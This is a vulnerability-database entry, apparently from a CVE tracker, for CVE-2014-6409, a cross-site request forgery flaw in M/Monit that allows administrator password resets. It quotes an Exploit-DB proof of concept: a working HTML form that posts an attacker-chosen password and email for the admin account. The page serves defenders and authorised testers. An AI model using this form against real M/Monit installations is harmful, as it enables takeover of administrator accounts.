CVE-2014-6409

medium
Published 2014-10-06 ยท Modified 2026-05-06
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
7.8

Description

Cross-site request forgery (CSRF) vulnerability in M/Monit 3.3.2 and earlier allows remote attackers to hijack the authentication of administrators for requests that change user passwords via the fullname and password parameters to /admin/users/update.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34718 webapps php text ยท 2 KB
Dolev Farhi ยท 2014-09-20

M/Monit 3.3.2 - Cross-Site Request Forgery

text exploit Source: Exploit-DB
Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at 
openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014 
Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1. 
About the application ------------------------ Easy, proactive 
monitoring of Unix systems, network and cloud services. Conduct 
automatic maintenance and recovery and execute meaningful causal actions 
in error situations M/Monit expand on Monit's capabilities and provides 
monitoring and management of all your Monit enabled hosts via a modern, 
clean and well designed user interface which also works on mobile 
devices. 2. Vulnerabilities Descriptions: ----------------------------- 
It was found that M/Monit latest version is vulnerable to CSRF attacks. 
it is possible to reset the password of any user account (admin/regular) 
on the system without needing to know the current set password for the 
attacked account. 3. Proof of concept exploit 
---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div 
align="center"> <pre> <h2><b> 		 CSRF PoC for M/monit 			<b></h2> <body> 
<form action="http://mmonit_server:8080/admin/users/update" 
method="POST"> <input type="hidden" name="fullname" 
value="Administrator" /> <input type="hidden" name="password" 
value="Attacker_Passw0rd" /> <input type="hidden" name="email" 
value="attacker@email.com" /> <input type="hidden" name="admin" 
value="on" /> <input type="hidden" name="uname" value="admin" /> <input 
type="submit" name="submit" value="Attack" /> 	</form> 	</body> </div> 
</html>

Application impact

VendorProductVersionsFixed
mmonitm\/monit{"endIncluding":"3.3.2"}

References

CWEs

CWE-352

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.